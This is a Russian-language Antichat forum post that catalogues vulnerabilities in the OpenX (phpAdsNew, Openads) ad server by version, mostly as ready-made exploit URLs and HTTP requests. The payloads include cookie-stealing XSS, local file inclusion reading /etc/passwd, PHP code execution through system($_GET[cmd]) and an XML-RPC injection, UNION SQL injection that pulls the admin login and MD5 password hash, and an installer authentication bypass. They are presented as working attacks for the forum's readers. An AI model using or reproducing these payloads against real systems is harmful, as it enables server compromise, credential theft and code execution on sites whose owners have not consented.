Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
[ Обзор уязвимостей OpenX (phpAdsNew, Openads) ] |
21.10.2009, 23:08
|
|
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
Провел на форуме:
2375131
Репутация:
1695
|
|
[ Обзор уязвимостей OpenX (phpAdsNew, Openads) ]
Обновлено 21.04.2010 (Спасибо всем за активность)
[ + ] Общая информация:
Сайт: http://openx.org
Текущая версия: OpenX 2.8.5
[ + ] Краткий экскурс в названия:
phpAdsNew, Openads, OpenX - это название одного продукта, которое менялось в течении времени.
phpAdsNew - название движка c версии 2.0 до 2.0.9
Openads - название движка c версии 2.0.10 до 2.4.3
OpenX - название движка c версии 2.4.4 до настоящего момента
[ + ] Структура БД:
>> ветка OpenX 2.6; OpenX 2.8
Префикс: ox_
Таблица: users
Поля: user_id, email_address, username, password
user_id админа = 1
Алгоритм хеширования пароля md5
>> ветка OpenX 2.4
Префикс: ox_
Таблица: preference
Поля: agencyid, admin, admin_pw, admin_email
agencyid админа = 0
Алгоритм хеширования пароля md5
>> ветка OpenX 2.0
Префикс: phpads_
Таблица: config
Поля: configid, admin, admin_pw, admin_email
configid админа = 0
Алгоритм хеширования пароля md5
[ + ] Уязвимости для всей ветки OpenX 2.0 [phpAdsNew все версии, Openads до 2.0.11-pr1 включительно]
>> Раскрытие пути
условия:
+ display_errors = On
сплоит:
http://host/adlayer.php?layerstyle=antichat
http://host/adclick.php?bannerid=id&antichat=xe%0Ak%0A
id - номер существующего баннера
>> XSS
условия:
+ register_globals = On
сплоит:
http://host/adcontent.php?bannerid=id&row[prepend]=<script>alert(document.cookie)</script>
http://host/adcontent.php?bannerid=id&row[append]=<script>alert(document.cookie)</script>
id - номер существующего баннера
>> Выполнение php кода
условия:
+ $phpAds_config['type_html_php'] = true; // default false
+ наличие html баннера
+ register_globals = On
сплоит:
http://host/adcontent.php?bannerid=id&row[prepend]=<?php phpinfo();?>
id - номер существующего html баннера
[ + ] Уязвимости phpAdsNew 2.0 - 2.0.5
>> Local File Include
http://securityreason.com/achievement_securityalert/21
сплоит:
http://host/adlayer.php?layerstyle=../../../../../../../../../../../etc/passwd%00
Примечание: возможно использовать ////[4096]//// как альтернатива null byte
[ + ] Уязвимости phpAdsNew 2.0 - 2.0.4-pr2
>> Выполнение php кода (XML-RPC Library Remote Code Execution)
http://www.securityfocus.com/bid/14088/info
сплоит:
POST /adxmlrpc.php HTTP/1.1
Host: host
Connection: close
Content-Length: 168
<?xml version="1.0"?>
<methodCall>
<methodName>test.method</methodName>
<params>
<param>
<value><name>','')); phpinfo(); exit;/*</name></value>
</param>
</params>
</methodCall> [ + ] Уязвимости phpAdsNew 2.0 - 2.0.4-pr1
>> Раскрытие пути
http://securityreason.com/achievement_securityalert/9
условия:
+ display_errors = On
сплоит:
http://host/libraries/lib-xmlrpcs.inc.php
http://host/maintenance/maintenance-activation.php
http://host/maintenance/maintenance-cleantables.php
http://host/maintenance/maintenance-autotargeting.php
http://host/maintenance/maintenance-reports.php
http://host/misc/backwards compatibility/phpads.php
http://host/misc/backwards compatibility/remotehtmlview.php
http://host/misc/backwards compatibility/click.php
http://host/adcontent.php
>> XSS
http://securityreason.com/achievement_securityalert/9
сплоит:
http://host/adframe.php?refresh=securityreason.com'><script>al ert(document.cookie)</script>
[ + ] Уязвимости Openads 2.4.0 - 2.4.2
>> Выполнение php кода
сплоит:
http://host/www/delivery/ai.php?filename=antichat.jpg';system($_GET[cmd]);/*&contenttype=antichat&cmd=ls -la
[ + ] Уязвимости OpenX 2.6.0 - 2.6.3
OpenX 2.4.4 - 2.4.9
Openads 2.4.0 - 2.4.3
>> Local File Include
http://milw0rm.org/exploits/7883
Условия:
+ magic_quotes_gpc = Off
сплоит:
http://host/www/delivery/fc.php?MAX_type=../../../../../../../../../../../../../../../etc/passwd%00
Примечание: используется функция file_exists - для проверки, поэтому ////[4096]//// не подойдет как альтернатива null byte
[ + ] Уязвимости OpenX 2.6.0 - 2.6.1
OpenX 2.4.4 - 2.4.8
Openads 2.4.0 - 2.4.3
>> SQL injection
Есть сплоит на milw0rm - мало того что написан как blind sql injection, хотя там обычная инъекция с выводом X_X, так он ещё и корявый, писал какой-то калека.
сплоит для OpenX 2.6.0 - 2.6.1:
http://host/www/delivery/ac.php
?bannerid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_w s(0x3a,u.username,u.password),19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 FROM ox_users u, ox_banners d, ox_clients m, ox_campaigns c WHERE u.user_id=1
Примечание: вывод будет в заголовок страницы <title> ... </title>
сплоит для OpenX 2.4.4 - 2.4.8
Openads 2.4.0 - 2.4.3:
http://host/www/delivery/ac.php
?bannerid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_w s(0x3a,p.admin,p.admin_pw),19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38 from ox_preference p, ox_banners d, ox_campaigns c WHERE p.agencyid=0
Примечание: вывод будет в заголовок страницы <title> ... </title>
[ + ] Уязвимости OpenX 2.6.0 - 2.6.4
OpenX 2.4.4 - 2.4.10
Openads 2.4.0 - 2.4.3
>> Blind sql injection
условия:
+ magic_quotes_gpc = Off
Описаниe: http://resources.enablesecurity.com/advisories/openx-2.6.4-multiple.txt
[ + ] Уязвимости OpenX 2.8.0 - 2.8.5
>> Раскрытие пути
условия:
+ display_errors = On
сплоит:
http://host/www/admin/plugins/oxMarket/library/OX/oxMarket/M2M/PearXmlRpcCustomClientExecutor.php
http://host//www/admin/plugins/oxMarket/library/OX/oxMarket/M2M/ZendXmlRpcCustomClientExecutor.php
http://host/www/admin/plugins/oxMarket/library/OX/oxMarket/Common/ConnectionUtils.php
http://host/www/admin/plugins/oxMarket/library/OX/oxMarket/Common/Cache.php
[ + ] Уязвимости OpenX 2.8.0
>> Обход аутентификации пользователя
сплоит:
POST /www/admin/install.php HTTP/1.1
Host: host
Connection: close
Content-Length: 13
btn_openads=1
[ + ] Уязвимости OpenX 2.8.2 - 2.8.3
>> Раскрытие установочной информации
сплоит:
POST /www/admin/install.php HTTP/1.1
Host: host
Connection: close
Content-Length: 28
btn_openads=1&btn_syscheck=1
Уязвимости которых нет:
phpAdsNew 2.0.4-pr2 Remote File Inclusion Exploit //константу нельзя передать как переменную )))
phpAdsNew-2.0.8/admin/upgrade.php?phpAds_config[language]=../../../etc/passwd%00 //phpAds_config[language] определен в конфиге
phpAdsNew-2.0.8 (adlayer.php) Remote File Include //Там нет даже LFI, не говоря о RFI
phpAdsNew-2.0.7/admin/report-index.php?filename=http://evil_scripts? //Меньше курить надо)
phpAdsNew-2.0.7/admin/lib-gui.inc.php?phpAds_config[my_footer]=http://evil_scripts? //И пить тоже)
phpAdsNew-2.0.7/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=http://evil_scripts?//
PS Если найдете какие либо неточности, ошибки или будут вопросы по уязвимостям, пишите в личку.
Последний раз редактировалось (Dm); 21.04.2010 в 15:50..
Причина: добавление информации
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид